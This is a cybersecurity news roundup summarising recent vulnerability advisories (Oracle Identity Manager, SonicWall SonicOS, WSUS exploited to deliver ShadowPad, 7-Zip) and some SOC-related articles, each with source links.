CISA Warns of Actively Exploited Critical Oracle Identity Manager Zero-Day Vulnerability
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a critical security flaw impacting Oracle Identity Manager to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
The vulnerability in question is CVE-2025-61757 (CVSS score: 9.8), a case of missing authentication for a critical function that can result in pre-authenticated remote code execution. The vulnerability affects versions 12.2.1.4.0 and 14.1.2.1.0. It was addressed by Oracle as part of its quarterly updates released last month.
Source: The hacker news | Bleeping computer | Securityweek | Darkreading | SANS internet storm center | Searchlight Cyber security research
Link: https://thehackernews.com/2025/11/cisa-warns-of-actively-exploited.html
Link: https://slcyber.io/research-center/breaking-oracles-identity-manager-pre-auth-rce/
New SonicWall SonicOS flaw allows hackers to crash firewalls
American cybersecurity company SonicWall urged customers today to patch a high-severity SonicOS SSLVPN security flaw that can allow attackers to crash vulnerable firewalls.
Tracked as CVE-2025-40601, this denial-of-service vulnerability is caused by a stack-based buffer overflow impacting Gen8 and Gen7 (hardware and virtual) firewalls.
“A Stack-based buffer overflow vulnerability in the SonicOS SSLVPN service allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash,” SonicWall said.
“SonicWall PSIRT is not aware of active exploitation in the wild. No reports of a PoC have been made public and malicious use of this vulnerability has not been reported to SonicWall.”
However, the company added that its Gen6 firewalls, as well as the SMA 1000 and SMA 100 series SSL VPN products, are not vulnerable to attacks potentially targeting this vulnerability.
Source: Bleeping computer | Securityweek | SonicWall psirt
Link: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0016
ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access
A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) has been exploited by threat actors to distribute malware known as ShadowPad.
“The attacker targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access,” AhnLab Security Intelligence Center (ASEC) said in a report published last week. “They then used PowerCat, an open-source PowerShell-based Netcat utility, to obtain a system shell (CMD). Subsequently, they downloaded and installed ShadowPad using certutil and curl.”
ShadowPad, assessed to be a successor to PlugX, is a modular backdoor widely used by Chinese state-sponsored hacking groups. It first emerged in 2015. In an analysis published in August 2021, SentinelOne called it a “masterpiece of privately sold malware in Chinese espionage.”
Source: The hacker news | hawktrace
Link: https://thehackernews.com/2025/11/shadowpad-malware-actively-exploits.html
Link: https://hawktrace.com/blog/CVE-2025-59287-UNAUTH
3 SOC Challenges You Need to Solve Before 2026
2026 will mark a pivotal shift in cybersecurity. Threat actors are moving from experimenting with AI to making it their primary weapon, using it to scale attacks, automate reconnaissance, and craft hyper-realistic social engineering campaigns.
Source: The hacker news
Link: https://thehackernews.com/2025/11/3-soc-challenges-you-need-to-solve.html
When Your $2M Security Detection Fails: Can your SOC Save You?
Enterprises today are expected to have at least 6-8 detection tools, as detection is considered a standard investment and the first line of defense. Yet security leaders struggle to justify dedicating resources further down the alert lifecycle to their superiors.
As a result, most organizations’ security investments are asymmetrical, robust detection tools paired with an under-resourced SOC, their last line of defense.
A recent case study demonstrates how companies with a standardized SOC prevented a sophisticated phishing attack that bypassed leading email security tools. In this case study, a cross-company phishing campaign targeted C-suite executives at multiple enterprises. Eight different email security tools across these organizations failed to detect the attack, and phishing emails reached executive inboxes. However, each organization’s SOC team detected the attack immediately after employees reported the suspicious emails.
Source: The hacker news
Link: https://thehackernews.com/2025/11/when-your-2m-security-detection-fails.html
Recent 7-Zip Vulnerability Exploited in Attacks
Threat actors are exploiting a recently patched 7-Zip vulnerability that leads to remote code execution (RCE), NHS England warns.
The bug, tracked as CVE-2025-11001 (CVSS score of 7.0), is described as a file parsing directory traversal issue, and requires user interaction for successful exploitation.
The flaw impacts 7-Zip’s handling of symbolic links in ZIP files, as crafted data could be used to traverse to unintended directories during processing.
“An attacker can leverage this vulnerability to execute code in the context of a service account,” a Trend Micro Zero Day Initiative (ZDI) advisory reads. According to ZDI, attack vectors depend on implementation.
Ryota Shiga of GMO Flatt Security was credited for finding this security defect and an identical vulnerability tracked as CVE-2025-11002.
Source: Securityweek
Link: https://www.securityweek.com/recent-7-zip-vulnerability-exploited-in-attacks/
Four-Step Intelligence Model for Decision Making
The OODA loop is a four-step model used in intelligence for decision making that involves analyzing information and acting on it. In this article, I explain the roots of its history, its applications in combat operations, and how it can be utilized for time-sensitive decision making processes in cybersecurity, including other areas of our lives.
Source: Secjuice
Link: https://www.secjuice.com/time-sensitive-decision-making-with-the-ooda-loop-model/